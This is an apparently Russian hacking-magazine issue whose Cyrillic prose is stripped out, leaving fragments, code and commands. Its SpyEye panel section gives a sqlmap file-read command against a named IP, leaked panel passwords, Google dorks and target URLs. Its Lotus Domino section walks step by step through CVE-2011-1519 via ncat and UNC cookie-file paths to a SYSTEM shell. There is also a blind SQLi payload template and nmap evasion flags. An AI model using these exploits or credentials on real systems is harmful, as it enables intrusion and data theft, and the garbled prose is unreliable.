( ). SpyEye TDL,
.
, 2009
,
, -
. Symantec, SpyEye
70 % Zeus ( ,
),
.
-, SpyEye
- .
- (C&C)
PHP, -
- . , - .
,
:
1. . ,
, PHP.
PHP-. , , PHP Bug
Scanner, Raz0r (bit.ly/tBFuwY).
crime kits .
SpyEye
01 /156/ 2012
065
SPYEYE
SpyEye Trojan Source Code Published!
.
- ?
, . ,
SpyEye .
,
Xylit0l, , ,
,
, .
, VMProtect,
SpyEye. , .
2. .
, , ,
Google Dorks ( ) .
3. .
Apache, MySQL, PHP ,
.
, ,
. .
,
1.0.2.
,
( frm_cards_edit.php):
Android.
Android.SpyEye.1. , SpyEye.
,
, ,
-. ,
- , ,
,
, -.
,
-. ,
, ,
NNNNNN. Android.SpyEye.1
,
.
: 251340.
-,
, .
$id_card = (int)$_GET['id'];
....
$id_card = $_GET['id']; if (!@$id_card) exit;
$dbase = db_open();if (!$dbase) exit;
$sql = ' SELECT cards.num, cards.csc, cards.exp_date,
cards.name, cards.surname, cards.address, cards.city,
cards.state, cards.post_code, country_t.name_country,
cards.phone_num, email_t.value_email '
. ' FROM cards, country_t, email_t'
. ' WHERE cards.fk_email = email_t.id_email'
. ' AND cards.fk_country = country_t.id_country'
. " AND cards.id_card = $id_card"
. ' LIMIT 0, 1';
$res = mysqli_query ($dbase, $sql);
....
Blind SQLi,
, $id_card
- . gribodemon
int, , ,
:
, gribodemon ,
:). .
, : BENCHMARK() SLEEP().
,
BENCHMARK()
.
SQLI
SQLi
r00tw0rm.com
Havij SQLi-. , frm_
findrep_sub2.php, , id
. sqlmap
, SQL- (sqlmap.
sourceforge.net):
sqlmap.py -u "http://92.241.1.1/frmcp1/frm_findrep_sub2.
php?id=1" --file-read=/var/www/frmcp1/config.php --tor
066
<?php
# Database
define('DB_SERVER', 'localhost');
define('DB_NAME', 'spyxz');
define('DB_USER', 'admin');
01 /156/ 2012
define('DB_PASSWORD', 'SpyEye2db');
# Admin
define('ADMIN_PASSWORD', 'r0t0wVr34xzbdQH');
?>
! !
, SQL-
, .
.
,
. ,
, SpyEye
( SpyEye_b0t.pl). C&C
SpyEye
Tracker (spyeyetracker.abuse.ch). ,
SpyEye. -
, ,
. !
, Google Dork?
.
:
intitle:"SYN 1" "Please, enter password"
intitle:"CN" "Your JavaScript is turned off. Please, enable
your JS"
intitle:"SYN" "Your JavaScript is turned off. Please, enable
your JS"
"Please, enter password:" inurl:"frm_auth.php"
intitle:"FRMCP"
"index of /SpyEye/"
Google Dorks
:
http://trylook.ru/frmcp1/
http://212.36.9.59/adm/frmcp/
http://zerocrown.webcindario.com/
http://alaggaer.ans1.rock21.us/SpyEye/main/
http://92.241.165.228/SpyEyeCollector/
, ,
92.241.165.228 ,
:
...
[FOUND] http://92.241.165.228/config.ini
[FOUND] http://92.241.165.228/error.log
[FOUND] http://92.241.165.228/frm_findrep_sub2.php
[FOUND] http://92.241.165.228/mod_perlre.php
[FOUND] http://92.241.165.228/frm_settings.php
.....
[FOUND] http://92.241.165.228/SpyEyeCollector/configs/
sec.config
.....
SpyEye (sec.config):
...
listening port for logs = "53"
mysql username = "root"
mysql password = "samsung"
...
01 /156/ 2012
!
(root:samsung). .
?
, trylook.ru/frmcp1.
:
....
[FOUND]
[FOUND]
[FOUND]
[FOUND]
...
[FOUND]
...
http://trylook.ru/frmcp1/css/
http://trylook.ru/frmcp1/js/
http://trylook.ru/frmcp1/config.ini
http://trylook.ru/frmcp1/error.log
http://trylook.ru/frmcp1/installer/
, SpyEye?
,
. , , ,
.
,
- .
.
SpyEye? ,
.
. z
067
Lotus,
LOTUS DOMINO CONTROLLER
INFO
IBM Lotus
Domino Server
IBM Lotus
Software,
IBM Lotus
Notes.
WWW
www.zerodayinitiative.com ZDI;
www.ibm.com/software/ru/lotus/ IBM
Lotus Software;
bugtraq.ru BugTraq;
dj.navexpress.com
DJ Java Decompiler.
, ,
,
.
.
.
IBM,
.
, , Lotus.
. . Lotus
: , , . . ,
,
.
, ,
, .
Lotus
. :)
- , ,
names.nsf -.
, , Lotus
8.5.2FP2. , exploit-db.com
.
BugTraq, ZDI, IBM c security- .
, , ,
068
. ,
, .
,
- ,
. :)
CVE-2011-1519
,
,
( , ). , ZDI ZDI-11-110,
0day ( ). :
Lotus Domino Server
Controller. .
, TCP- 2050.
COOKIEFILE,
01 /156/ 2012
Lotus,
.
.
UNC,
. ,
SYSTEM.
:
COOKIEFILE
, \\evilhost\password_cookie_file,
.
, ,
.
.
, , 2050. , Lotus .
.
, .
, , ,
nmap.
Lotus-,
, ,
.
:
socket:reconnect_ssl()
...
socket:send("#API\n")
socket:send( ("#UI %s,%s\n"):format(user,pass) )
socket:receive_lines(1)
socket:send("#EXIT\n")
...
, Lotus-
: SSL-,
#. ,
admin pass
#UI admin,pass. , , nmap
COOKIEFILE . ,
, #COOKIEFILE \\evil\
file. , ,
( ,
).
-
. ,
Java, IDA Pro, - . DJ decompiler (members.
.
:
/* */
do{
// ReadFromUser
int i = ReadFromUser();
...
if(i == 6) { // #APPLET
appletConnection = true;
continue;
}
...
userinfo = UserManager.findUser(usr);
if(userinfo == null) {
// ... !
WriteToUser("NOT_REG_ADMIN");
continue;
}
...
if(!appletConnection)
// #APPLET,
flag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());
else // #APPLET
// COOKIE? !
flag = verifyAppletUserCookie(usr, pwd);
...
} while(true); // end loop
if(flag) // ,
// , !
...
,
#APPLET #UI #COOKIEFILE. , , ,
Ncat-
01 /156/ 2012
069
admindata.xml. , ,
( NOT_REG_ADMIN )!
.
adm,
.
verifyAppletUserCookie:
//#COOKIEFILE <cookieFilename>
if(cookieFilename == null || cookieFilename.length() == 0)
return flag;
// !
File file = new File(cookieFilename);
...
inputstreamreader = new InputStreamReader(
new FileInputStream(file),"UTF8");
...
//s7 cookieFilename
do {
if((j = s7.indexOf("<user ", j)) <= 0) break;
...
String s2 = getStringToken(s7, "user=\"", "\"", j, k);
...
String s3 = getStringToken(s7, "cookie=\"", "\"", j, k);
...
String s4 = getStringToken(s7, "address=\"", "\"", j, k);
...
if(s5.equalsIgnoreCase(s2) && s6.equalsIgnoreCase(s3)
&& appletUserAddress.equalsIgnoreCase(s4)) { //!
flag = true; break;
}
...
} while(true);
,
username, password address username, password
address cookiefile, ,
! ,
:
1. <user> .
2. username, password, address.
3. ,
.
4. ,
.
CVE-2011-1519
.
1. cookie.xml:
#APPLET , cookie .
#UI,
, #COOKIEFILE.
,
. #EXIT ,
! ? ,
LOAD,
.
, . , IBM
LOAD
, .
, nmap-, ,
. LOAD
, :
ncat --ssl tagetlotus_host 2050
#API
#APPLET
#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#EXIT
$whoami
whoamiBeginData
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Lotus\Domino\data>whoami
NT AUTHORITY\SYSTEM
C:\Lotus\Domino\data>
,
.
,
#API , API Java-,
, ncat . ,
Lotus ,
SMBRelay.
?
<user name="usr" cookie="psw" address="dsecrg">
, . ?
, -. -,
, usr .
2. ,
, \\fileserver\public\cookie.xml.
3. ncat:
ncat --ssl targetlotus_host 2050
#API
#APPLET
#COOKIEFILE \\fileserver\public\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#EXIT
070
01 /156/ 2012
Lotus,
SMB- ? ,
, UNC ( , ).
,
- . , IBM , : cookiefile
. . ,
- \\evil\cookie\file,
, : .\\evil\cookie\
file, UNC . , SSL-,
. . IBM! , cookiefile,
, - XML-
XML-. XML, ! , , IBM,
XML- :
<?xml version="1.0" encoding="UTF-8"?>
<user name="admin" cookie="dsecrg" address="dsecrg">
:
Bla-bla-bla<user name="admin"xXXxcookie="dsecrg"Xaddress="
dsecrg"NYA>
. :
1. cookievalues Microsoft HTTPAPI
service ( \r\n Enter):
ncat targethost 49152
GET /<user HTTP/1.0\r\n
\r\n
ncat targethost 49152
GET /user="admin"cookie="pass"address="http://site.com"
HTTP/1.0\r\n
\r\n
2. - :
#Software: Microsoft HTTP API 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
...
2011-08-26 11:53:30 10.10.10.101 52902 10.10.9.9
47001 HTTP/1.0 GET <user 404 - NotFound 2011-08-26 11:53:30 10.10.10.101 52905 10.10.9.9
47001 HTTP/1.0 GET name="admin"cookie="pass"address="
http://site.com"> 404 - NotFound ...
: IBM
<user , %20 ( ). ,
, <user ( 404 NotFound).
.
3. , -, :
ncat --ssl tagetlotus_host 2050
#API
01 /156/ 2012
1. ,
. , ,
ARP-POISONING,
(,
Cain, DoS
- mail.ru).
2. , .
, (
). ,
, ,
,
, ,
(,
Java 6 ROP ASLR).
3. IT- ,
- ,
.
4. . .
,
. , , ,
, 99
.
.
#APPLET
#COOKIEFILE ..\..\..\windows\system32\logfiles\httperr\
httperr1.log
#USERADDRESS http://twitter/asintsov
#UI admin,pass
#EXIT
$whoami
...
NT AUTHORITY/SYSTEM
...
UNC,
- .
. -,
, , .
-, .
-, , - (
, LOAD TELL
).
admindata.xml. MD5. ,
. 4, 25 26 ,
. ,
, ! z
071
X-Tools
:
scarlet0
URL:
bit.ly/tIS6m2
:
Windows
URL:
3.14.by/ru/md5
:
Windows
:
cel1697i845
URL:
bit.ly/vmJ2g8
:
Windows
MSSQL
INJECTION HELPER
MD5-
MD5-
?
BarsWF World Fastest MD5 cracker.
,
MD5-
. ?
:
+ ;
+ -
;
+ ;
- MD5;
- ;
-
.
:
1.
. , Intel Core 2
Quad QX6700 (3,01 GHz)
200
!
2. Radeon:
AMD BROOK, CUDA
NVidia.
,
.
,
,
, .
, ,
?
!
Brutus hashes. New generation
!
, ,
, ,
. :-)
:
1. .
2. , .
3. .
4. ,
.
, . 6 131 066 257 801 .
072
01 /156/ 2012
X-Tools
PCI DSS !
PANBuster ,
, (
) .
PCI DSS,
-
PAN () .
, PANBuster
PCI QSA, ,
,
.
:
Windows, Linux, Mac OS X;
(VISA,
:
XMCO Security
Research Labs
URL:
www.xmco.fr/
panbuster.html
:
*nix/win/mac
:
TIMHOK
URL:
bit.ly/vZbhcN
:
Windows
:
YGN Ethical Hacker
Group
URL:
bit.ly/vDpEt8
:
*nix/win
:
SuRGeoNix
URL:
bit.ly/lXxLkm
:
Windows
SCREEN-
JOOMLA!
WEBSURGERY,
,
, screen-. , ,
, ,
. ,
,
. , DDMgr screen-
.
:
;
;
;
;
,
;
( ,
);
,
DDMgr
,
. ,
,
,
.
WebSurgery : -, ,
SQL, XSS,
, WAF,
DoS , -. ,
PHP- vuln.php,
SQL-.
MySQL MD5- . .
1. (Initial Request):
01 /156/ 2012
joomscan.pl -u http://joomla-site.com/ \
-x proxy:port
2. -
(List Configuration) : 1 32 ( MD5),
.
3. :
GET /vuln.php?id=1+and+'${List_2}'=
substring((select+password+from+admin+
limit+1),${List_1},1) HTTP/1.1
HOST: 1.2.3.4
073
Mifrill (mifrill@real.xakep.ru)
074
01 /156/ 2012
?
, .
,
.
.
,
, ,
,
, , , , .
, , ,
,
. ,
, ,
,
.
, ? Hackerspace
hackspace ,
,
. ,
IT.
, ,
. , ,
, ,
. .
,
.
, , . -
,
do it yourself
( ). , -
{ neuron }
.
,
. , .
,
,
.
, ,
.
01 /156/ 2012
075
:).
C-Base. !
,
, ,
! ,
,
: , , ,
. ,
,
.
,
,
.
, ,
- : 3D-,
,
. ,
.
, ,
- ,
.
,
, ,
.
3050
. ,
10001500 . ,
,
.
, ,
, , ,
,
.
, ,
,
,
-
,
. ,
,
hackerspaces.org, , . ----
.
, ! .
,
.
,
, ,
Neuron
(neuronspace.ru).
. ,
FOSS Labs .
:
, ,
, -. ,
Neuron
.
:
(eSage lab,
-base
NYC Resistor
: www.c-base.org.
: , .
: 300+.
: 17 .
: london.hackspace.org.uk.
: , .
: 300+.
: 5 .
: www.nycresistor.com.
: , -.
: 30+.
: $75115.
C-base
1995 .
.
076
.
, 2009 ,
.
.
NYC Resistor
. 2008 .
01 /156/ 2012
), (Fairwaves, )
(eSage lab).
.
. , ,
,
,
.
, , , ,
, .
CCC ,
, ,
. CCC
, .
,
,
. ,
, C-base .
, .
, , .
. ,
, ,
, - , ... ,
:). ,
, .
Neuron
,
.
. ,
.
,
- , , .
.
.
? .
,
.
,
?
. ,
(
3D-). Neuron
, ,
. ,
Software Defined Radio,
.
WiMAX GSM. ,
,
.
3D-. ,
,
.
Kiberpipa
Metalab
: www.kiberpipa.org.
: , .
: 20 40 ,
.
: .
: www.metalab.at.
: , .
: 130+.
: 20 .
. , 2001
, ,
-.
01 /156/ 2012
. 2006 . Metalab
.
,
neuronspace.ru.
,
,
Arduino. , ,
! ,
1517 .
, , , :
. , 15 ,
, 150,
.
, ,
. , Neuron,
, .
,
!
, ,
, , (,
;
).
,
! HackSpace Saint-Petersburg, -
077
.
- .
, .
: -
3D-, ,
, ,
3D-
.
,
.
, , ,
(hackspace-spb.ru).
, , ?
?
,
(po@kumekay.
com). , :
. , .
, , .
-
, (
29 . .
Mifrill): , -
.
.
40 .
. : ,
, .
, ,
.
,
,
, . ,
,
. ,
,
. ,
( )
. ,
,
C-Base, , ,
078
01 /156/ 2012
NYC Resistor
. , , , ,
.
:
$50100,
(, , ;
1030 ). ,
,
- ,
,
.
, , ,
.
,
,
.
, .
?
? .
.
-
NYC Resistor.
, , MakerBot, 3D-.
30 .
. ,
. -
NYC Resistor :
,
, . ,
. :)
,
, ,
. ,
,
200300 -
01 /156/ 2012
. , ,
,
,
.
(, -
, ), .
,
,
, ,
- .
, C-Base 300 .
,
. C-base
.
, ,
, .
, ,
Space Foundation, -
. ,
,
(Space Foundation , ),
,
,
,
. ,
, .
Neuron.
100 .
120 .
( ),
.
: . , ,
. .
:).
6
, 2 . .
Neuron
. ,
. , ,
,
.
,
.
, ,
HackSpace-SPb
. ,
,
,
. z
079
MALWARE
, Stuxnet
.
IDA
Stuxnet,
,
.
WIN32/DUQU:
STUXNET
,
RSS- .
Stuxnet
. , Symantec,
, - , - Duqu. ,
research Stuxnet. , Duqu
Stuxnet , ,
, Stuxnet. =)
,
Cryptography and System Security (CrySyS). Duqu, Stuxnet,
. , CrySyS
-
Duqu , .
. 1. !
080
01 /156/ 2012
.2. .
Duqu ,
.
, .
, , Duqu, Stuxnet,
.
Duqu :
0) doc-, , CVE-2011-3402.
1) - win32k.sys.
2) -, .
3) .
4)
services.exe Duqu . .
- Duqu Stuxnet.
, -, .
,
Duqu .
, -
. 4.
. 5.
Stuxnet
cmi4432.sys,
, C-Media Electronics Inc. ,
, VeriSign
2012 ( 1).
. Duqu
. ,
.
DUQU
,
, 3.
, .
,
, . ,
Duqu , .
4.
,
,
Stuxnet. , , ,
,
. 5 Stuxnet, 6 Duqu.
.3.
01 /156/ 2012
(,
): , ,
, , , , , , .
, .
, ,
Duqu Stuxnet.
,
,
. ,
,
Stuxnet, Duqu.
081
MALWARE
, .
?
Win32/Duqu, , . , ,
.
, Duqu
,
, (
, ).
. , main.dll (
Duqu),
UTC-. 7 ,
.
.
Duqu: the precursor to the next Stuxnet ,
36 ,
. ,
( 8).
, ,
, , -
. 7.
. 8.
. 9.
. 10.
14.10.2011
19.10.2011
1.11.2011
3.11.2011
4.11.2011
CrySyS
.
Duqu: the precursor to the next Stuxnet,
Win32/Duqu.
(, ,
).
(CVE2011-3402),
,
CrySyS.
CVE-2011-3402
Microsoft
Active Protections Program
(MAPP).
CrySyS, Symantec
Microsoft.
,
,
.
082
01 /156/ 2012
Stuxnet
Duqu
SCADA-
1-day
0-day
RPC-
remote
local
.
, ,
36 , 30. , 11.08.2011,
7:50:01 36
, 9,
18.08.2011, 7:29:07 30 10.
( )
Visual C++
ATL
UPX
RpcHandler_1 ;
RpcHandler_2
;
RpcHandler_3 ;
RpcHandler_4
CreateProcess();
RpcHandler_5 (,
);
RpcHandler_6 ;
RpcHandler_7 .
,
, 12.
RPC-
.
. 12. ,
01 /156/ 2012
Stuxnet 80 :),
?.
,
. ,
. , Stuxnet, Duqu
. ,
Duqu,
, , .
-,
.
, , ,
Duqu . z
083
MALWARE
(http://group.xakep.ru)
:
bootkit test
BITDEFENDER, ESET NOD32, F-SECURE,
OUTPOST SECURITY, RISING
, MBR, :
MS-DOS,
Doom 2
.
.
?
? - !
084
01 /156/ 2012
: bootkit test
Sinowal NOD
MBR Boot- :
MBR, Sinowal
01 /156/ 2012
: GHODOW
,
, Sinowal,
.
, Sinowal, , ,
. Win32/Ghodow.
NAD ( ESET).
Ghodow.
MBR
085
MALWARE
(http://group.xakep.ru)
BitDefender :
.
, BitDefender
Rescue Mode, *nix- , .
: BitDefender .
NOD32 :
MBR- 0.
, , .
MBR,
.
, quick/
- .
,
, , ,
.
Hiew ,
0x200 0x200 0x1000 . , , , ,
MBR. ,
BitDefender, Rising ,
. ,
, , .
, MBR
. , ,
MBR, , .
NTFS- ( , -)
.
-
, MBR.
BitDefender 2012
086
?
. , , .
, , : ;). z
BitDefender,
BitDefender 2012
01 /156/ 2012
Preview
UNIXOID
112
ANDROID
CyanogenMod,
- ,
2
Android-.
, firmware.
,
,
.
,
,
,
, 3G- ..
Android-
.
88
.NET-
-.
Microsoft . -.
SYN\ACK
118
?
, , ,
.
01 /156/ 2012
UNIXOID
102
,
. opensource.
FERRUM
126
- NAS'
Pentium
IDE- sux! , 12
NAS' .
SYN\ACK
122
100 . .
?
132
LOOP
,
,
. .
087
.NET
.NET FRAMEWORK
,
.
,
,
,
.
,
,
().
088
INFO
Strong name
,
, ,
WWW
http://gacbrowser.
blogspot.com/
GAC
Browser.
bit.ly/uyxZs5
,
28147-89 C#.
DVD
.
, .NET Framework,
System.Security.Cryptographi,
, .NET Framework
CLR
.
.NET,
.
SYSTEM.SECURITY.CRYPTOGRAPHI
, , .NET Framework
System.Security.Cryptographi,
:
,
, - . .;
, . .;
X.509 XML-
(XMLSignature).
,
, (. 1). ,
SymmetricAlgorithm,
01 /156/ 2012
.NET-
AssymetricAlgorithm, HashAlgorithm
KeyedHashAlgorithm ,
-. .NET
, ,
. 28147-89 ,
, ,
.
SYMMETRICALGORITHM
, .NET Framework
SymmetricAlgorithm. MSDN,
:
public
public
public
public
,
,
. , ICryptoTransform .
MSDN . ,
ICryptoTransform
. :
int TransformBlock(byte[] inputBuffer,
int inputOffset, int inputCount,
byte[] outputBuffer, int outputOffset);
byte[] TransformFinalBlock(byte[] inputBuffer,
int inputOffset, int inputCount);
, . MSDN
, , SymmetricAlgorithm, ,
(CBC).
, 28147-89
, CBC . ,
.NET Framework , ,
(CFB).
, .
28147-89
, 28147-89
ECB ( )
, .NET Framework CFB.
GostCfb, .
CFB ( )
01 /156/ 2012
.NET Framework
namespace Gost
{
public class GostCfb : SymmetricAlgorithm
{
public GostCfb(){}
public override ICryptoTransform CreateDecryptor
(
byte[] rgbKey,
byte[] rgbIV
){}
public override ICryptoTransform CreateDecryptor()
{}
public override ICryptoTransform CreateEncryptor
(
byte[] rgbKey,
byte[] rgbIV
){}
public override ICryptoTransform CreateEncryptor()
{}
public override void GenerateIV(){}
public override void GenerateKey(){ }
}
.
private static byte[] GetRandomBytes(int bytesCount)
private static void Gamm(byte[] input,
byte[] gamma, byte[] output)
, .NET
FRAMEWORK ,
,
(CFB)
089
OID
XOR . ,
, .
GetRandomBytes
GenerateIV GenerateKey: IVValue
KeyValue,
.
. , ,
64 256 .
- ,
.
(, ),
(, ).
, .
OID (object identificator),
. OID ,
(,
) ,
. OID
(arcs), :
"{joint-iso-itu-t(2) ds(5) attributeType(4)
distinguishedName(49)}"
"2.5.4.49"
public GostCfb()
{
LegalBlockSizesValue = new[]
{ new KeySizes(64, 64, 0) };
LegalKeySizesValue = new[]
{ new KeySizes(256, 256, 0) };
BlockSizeValue = 64;
KeySizeValue = 256;
}
CreateEncryptor
CreateDecryptor, GostCfb
, ICryptoTransform.
private sealed class GostCfbTransformEncr:ICryptoTransform
{}
private sealed class GostCfbTransformDecr:ICryptoTransform
{}
(
). ASN.1 ,
,
-
.
www.oid-info.com.
ASN.1 -
,
,
. ASN.1
ITU-T, ,
.
.
GOSTCFBTRANSFORMENCR
CreateEncryptor . GostCfb.
, , , .
, ,
, ECB CFB,
,
2 ( , ).
() ,
.
OID ,
,
//
private byte[] m_Key;
// ,
//
private byte[] m_State;
//
private byte[] tmpState;
090
:
public int TransformBlock(...)
01 /156/ 2012
.NET-
{
...
byte[] plainBlock = new byte[8];
int result = 0;
while(inputCount > 0)
{
//
Array.Copy(inputBuffer, inputOffset, plainBlock, 0,8);
Gost28147.Gost28147Ecb(m_State, tmpState, m_Key);
Gamm(plainBlock, tmpState, m_State);
Array.Copy(m_State, 0, outputBuffer, outputOffset, 8)
inputCount -= 8;
inputOffset += 8;
outputOffset += 8;
result += 8;
}
...
return result;
}
,
. , ,
XOR. , ,
.
TransformFinalBlock
TransformBlock, .
,
,
.
GostCfbTransformDecr
GostCfbTransformEncr,
CFB, , ,
( ,
).
KEYEDHASHALGORITHM
KeyedHashAlgorithm .
HashAlgorithm, :
protected abstract void HashCore(
byte[] array, int ibStart, int cbSize)
protected abstract byte[] HashFinal()
CLR
,
28147-89. ( 16 ,
16 ). , ,
HashAlgorithm, , ,
KeyedHashAlgorithm:
.
28147-89 GostImito.
KeyValue
HashValueSize 32, 32 .
HashCore , (
InternalTransform).
DWORD, 16-
, :
...
uint tempInH = Gost28147.Bytes2Dword(array,
(int)(ibStart + i * 8));
uint tempInL = Gost28147.Bytes2Dword(array,
(int)(ibStart + i * 8 + 4));
uint tempOutH = 0;
uint tempOutL = 0;
Gost28147.EncryptBlock16(ref tempInH, ref tempInL,
ref tempOutH, ref tempOutL,
Gost28147.P, KeyValue);
uImito ^= tempOutH;
...
(8 ) DWORD, 16-
(EncryptBlock16),
.
DWORD , -,
(XOR DWORD
, XOR ), , .
HashFinal ,
.
.NET
Framework GAC.
GAC
GAC Browser
01 /156/ 2012
.NET,
GAC, Global Assembly Cache (-
091
). GAC ,
. , , strong name, ,
, .
,
sn.exe, .NET
Framework. :
sn.exe -k keypair.snk
keypair.snk. Signing
Sign the assembly (.
3). . , .
GAC
gacutil, .NET Framework.
.NET,
, GAC .
:
gacutil /i < >
.NET .
machine.config, XML .
cryptographySettings,
mscorlib. Name Mapping.
:
cryptoClass,
nameEntry. , ,
.
OID -
oidMap
oidEntry.
<cryptographySettings>
<cryptoNameMapping>
<cryptoClasses>
<cryptoClass GOSTCFB="Gost.GostCfb, GostAlgs,
Version=1.0.0.0,Culture=ru,PublicKeyToken=9b088f4818daa492"/>
<cryptoClass GOSTIMITO="Gost.GostImito, GostAlgs,
Version=1.0.0.0,Culture=ru,PublicKeyToken=9b088f4818daa492"/>
</cryptoClasses>
<nameEntry name="GostImitoAlg" class="GOSTIMITO" />
<nameEntry name="GostCfbAlg" class="GOSTCFB" />
<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />
</cryptoNameMapping>
<oidMap>
<oidEntry OID="1.2.643.2.2.21" name="GostCfbAlg" />
<oidEntry OID="1.2.643.2.2.22" name="GostImitoAlg" />
</oidMap>
</cryptographySettings>
GOSTCFB GOSTIMITO,
GostCfbAlg GostCfb, GostImitoAlg
GostImito.
<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />
, GostCfb, - GostImito
(. 5). SymmetricAlgorithm.
Create GostCfbAlg .
CryptoConfig
092
01 /156/ 2012
.NET-
28147-89
28147-89
,
. ,
: XOR,
2^32 11 .
(8 ) 4
. ( mod 2^32),
(SBox), .
.
31- , 32 ,
8 .
, 28147-89,
.
.
7.
KeyedHashAlgorithm.Create, .
CryptoConfig.CreateFromName,
Activator.CreateInstance
catch.
null.
oidMap OID
, CryptoConfig
OID . , MSDN , name oidEntry
( , , GostCfb),
,
nameEntry, OID .
, - , ,
machine.config. OID private machineOidHT, -private
machineNameHT CryptoConfig (. 6).
, 28147-89
CLR
- ,
CryptoStream,
Stream.
.
, ,
CryptoStream ,
CryptoStream .
.
-
.
CryptoStream
,
. ,
,
, Position - CryptoStream.
01 /156/ 2012
MONO PROJECT
Mono, , GAC,
. , ,
:
$ gacutil -i < >
:
$ gacutil -l
,
.NET Framework, .
- . z
093
(ivinside.blogspot.com)
.
,
?
, 50
, (
50 ; , ).
,
.
. ,
094
.
- , :
,
, .
(100 - ) / .
, y(x) = x + (100 - x) / x.
. ,
, . ;).
, , = 10,
19. ! . , ...
, .
,
01 /156/ 2012
, , , !
,
. , : n(k) + (n(k) - 1) + ... +
(n(k) - k + 1), k , n
. , ,
:
(2 * n(k) - k + 1) * k / 2. n(k) = 100 / k + k / 2 - 1/2,
. :) , ,
200, , 14,
.
:
tokens = []
for token in tokeniter:
if token not in tokens:
tokens.append(token)
tokensiter ,
, .
, tokensiter.
.
if token not in
tokens:, -
O(n*m), 1 < m < n. , , . ,
, .
:
import random
import timeit
#
# 1 99999
f = []
for i in xrange(1, 20000):
f.append(random.randrange(1, 100000))
#
def func1():
tokens = []
for token in f:
if token not in tokens:
tokens.append(token)
#
def func2():
tokensdict = {}
i = 0
for token in f:
if not tokensdict.has_key(token):
# :
tokensdict[token] = i
i += 1
#
01 /156/ 2012
$ python2 test.py
6.80089592934
0.0135538578033
600 .
O(n),
.
.
O(log n).
.
?
Linux.
value , , pid.
CPU, ,
4-
, 100%, 400%.
cgroups,
.
.
cgroups:
$ yaourt -S libcgroup
095
,
:
group default {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 10; }}
1
, - .
: ) , )
, .
2
( ).
, Python.
group daemons/tomcat {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 40; }}
3
, URL (
URL), N
. N,
, 10.
.
threading, eventlet, gevent, Twisted .
4
Oracle
. , ,
.
group daemons/postgres {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 50; }}
mount {
cpu = /mnt/cgroups/cpu;
cpuacct = /mnt/cgroups/cpu;
}
,
: daemons/tomcat 40 %, daemons/
postgres 50 %, default 10 %. . /etc/cgrules.conf:
<user>
*:tomcat
*:postgres
*
<controllers>
cpu
cpu
cpu
filtered , .
:
;
;
;
(
, ).
:
IP- MAC- ( ,
/, ):
<destination>
daemons/tomcat/
daemons/postgres/
default/
tomcat daemons/
tomcat, postgres daemons/postgres, default.
, , + ,
;
, .
. ,
/ filtered.
?
096
nmap, :
--max-rate 50
50 /;
-f ;
-g 88 ;
--data-length 50 50
.
/. z
01 /156/ 2012
>> coding
deeonis (deeonis@gmail.com)
-
,
-
.
, ,
,
.
,
, Singleton.
,
, .
098
, Singleton. , , - .
, -
Windows, user mode - , . ,
, ini-
. , ,
,
. Save,
. , ,
?
,
.
.
.
, ,
, gSettings,
. CSettings. , ,
, .
.
class CSettings
{
public:
void getSettings() {...};
//...
01 /156/ 2012
}
//
CSettings gSettings;
-,
.
CSettings gSettings. , , ,
,
, , gSeetings
. -,
, .
gSettings, ,
,
.
, ,
. -, CSettings, ,
, , gSettings
. ,
, , .
- :
static
.
class CSettings
{
public:
static void getSettings() {...};
//...
}
//
CSingleton;
class CSettings
{
private:
CSettings();
static CSettings* m_instance;
public:
static CSettings* getInstance()
{
if (m_instance == 0)
m_instance = new CSettings();
return m_instance;
}
void getSettings() {...};
//...
}
//
CSettings* CSettings::m_instance = 0;
// CSettings
CSettings::getInstance()->getSettings();
CSettings::getSettings();
, , .
,
, , . ,
:
.
- . , ,
ini-. ,
, , -
CSettings , CSettings
.
, , CSettings
. , new.
-
getInstance().
CSettings
m_instance, ,
,
. , 100 %- ,
,
, ,
.
, ,
,
. ,
. ,
, .
, C++ .
, . , private,
.
, .
.
( ) .
.
, . .
CSingleton,
,
getInstance(), . ,
,
( ,
), , -
01 /156/ 2012
099
, getInstance
. .
CSingleton
template <class T>
class CSingleton
{
public:
virtual ~CSingleton() {};
static T* getInstance()
{
if (m_instance == 0)
m_instance = new T();
return m_instance;
}
protected:
CSingleton() {};
static T* m_instance;
};
// CSettings
class CSettings : public CSingleton<CSettings>
{
private:
CSettings();
protected:
friend class CSingleton<CSettings>;
public:
static void getSettings() {...};
//...
}
CSingleton ,
getInstance . , , ,
CSettings - ,
new.
, C++ friend,
. -
.
,
. ,
, CSingleton
, .
CSingleton, .
Wikipedia
,
CSettings. , 1
getInstance. , m_instance
, , CSettings , .
2, getInstance,
, , m_instance.
1, ,
CSettings , m_instance.
.
, , ,
.
, . C++
, API- . Windows CSingleton,
, :
CSingleton
template <class T>
class CSingleton{
public:
virtual ~CSingleton() {};
static T* getInstance()
{
EnterCriticalSection(...);
if (m_instance == 0)
m_instance = new T();
LeaveCriticalSection(...);
return m_instance;
}
protected:
CSingleton() {};
static T* m_instance;
};
,
CSettings, .
, .
100
. , , ,
, .
, -. z
01 /156/ 2012
>> coding
UNIXOID
grinder (grinder@tux.in.ua)
LINUX
,
:
,
,
,
.
.
.
102
INFO
Sabayon
.
Sabayon emerge
,
equo,
.
.config Calculate
Linux
1560 ,
866,
Sabayon
2625 1250
.
Calculate
Linux
.
Linux Mint
.
PCLinuxOS
x64.
, Mageia
Mandriva.
GENTOO
Gentoo,
, ,
:
.
,
( USE), ,
.
Sabayon 7
: sabayon.org
: GPL
: i686, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 3.0, Glibc 2.13, Udev 171, X.org 1.10.4, GNOME 3.2, KDE 4.7,
LibreOffice.Org 3.4.3
